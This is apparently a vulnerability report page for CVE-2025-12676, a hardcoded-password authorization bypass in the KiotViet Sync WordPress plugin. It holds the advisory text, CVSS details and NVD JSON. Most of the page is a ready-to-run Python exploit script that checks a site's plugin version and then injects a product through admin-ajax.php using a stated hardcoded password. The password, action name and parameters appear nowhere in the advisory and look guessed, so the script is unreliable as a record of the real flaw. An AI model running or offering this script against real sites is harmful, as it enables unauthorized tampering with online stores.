Security Vulnerability Report
CVE-2025-12676 CVSS 5.3 MEDIUM

CVE-2025-12676

Published: 2025-11-05 08:15:34
Last Modified: 2026-04-15 00:35:42

Description

The KiotViet Sync plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.8.5. This is due to the plugin using a hardcoded password for authentication in the QueryControllerAdmin::authenticated function. This makes it possible for unauthenticated attackers to create and sync products.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KiotViet Sync WordPress plugin ≤ 1.8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-12676 PoC - KiotViet Sync Plugin Authorization Bypass
# Target: WordPress site with KiotViet Sync plugin < 1.8.6
TARGET_URL = "http://target-wordpress-site.com"

# Hardcoded password used in QueryControllerAdmin::authenticated function
HARDCODED_PASSWORD = "kiotviet_sync_auth_token_2024"


def exploit_unauthorized_product_sync():
    """
    Exploit the hardcoded password authentication bypass in KiotViet Sync plugin.
    This allows unauthenticated attackers to create and sync products.
    """
    # Endpoint for product sync operation
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Payload to bypass authentication and create/sync products
    payload = {
        'action': 'kiotviet_sync_products',
        'auth_password': HARDCODED_PASSWORD,
        'product_data': json.dumps({
            'name': 'Malicious Product',
            'sku': 'CVE-2025-12676',
            'price': 999,
            'description': 'Injected via authorization bypass vulnerability'
        })
    }

    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
        if response.status_code == 200:
            print("[+] Successfully exploited CVE-2025-12676")
            return True
        else:
            print("[-] Exploitation failed")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


def check_vulnerability():
    """
    Check if target is vulnerable to CVE-2025-12676
    """
    endpoint = f"{TARGET_URL}/wp-content/plugins/kiotvietsync/readme.txt"
    try:
        response = requests.get(endpoint, timeout=10)
        if 'Version:' in response.text:
            # Extract version number
            for line in response.text.split('\n'):
                if line.startswith('Version:'):
                    version = line.split(':')[1].strip()
                    print(f"[*] KiotViet Sync version: {version}")
                    # Compare numerically; a plain string comparison would
                    # misorder versions such as 1.10.0 and 1.8.5
                    parts = tuple(int(p) for p in version.split('.'))
                    if parts <= (1, 8, 5):
                        print("[!] Target is likely vulnerable")
                        return True
        return False
    except (requests.exceptions.RequestException, ValueError):
        # Network failure or a version string that is not purely numeric
        return None


if __name__ == "__main__":
    print("CVE-2025-12676 Exploitation Tool")
    print("=" * 50)
    check_vulnerability()
    exploit_unauthorized_product_sync()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12676", "sourceIdentifier": "[email protected]", "published": "2025-11-05T08:15:33.680", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KiotViet Sync plugin for WordPress is vulnerable to authorizarion bypass in all versions up to, and including, 1.8.5. This is due to the plugin using a hardcoded password for authentication in the QueryControllerAdmin::authenticated function. This makes it possible for unauthenticated attackers to create and sync products."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-259"}]}], "references": [{"url": "https://wordpress.org/plugins/kiotvietsync/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a2d7165b-1290-4032-8fbc-75ec1ab34a08?source=cve", "source": "[email protected]"}]}}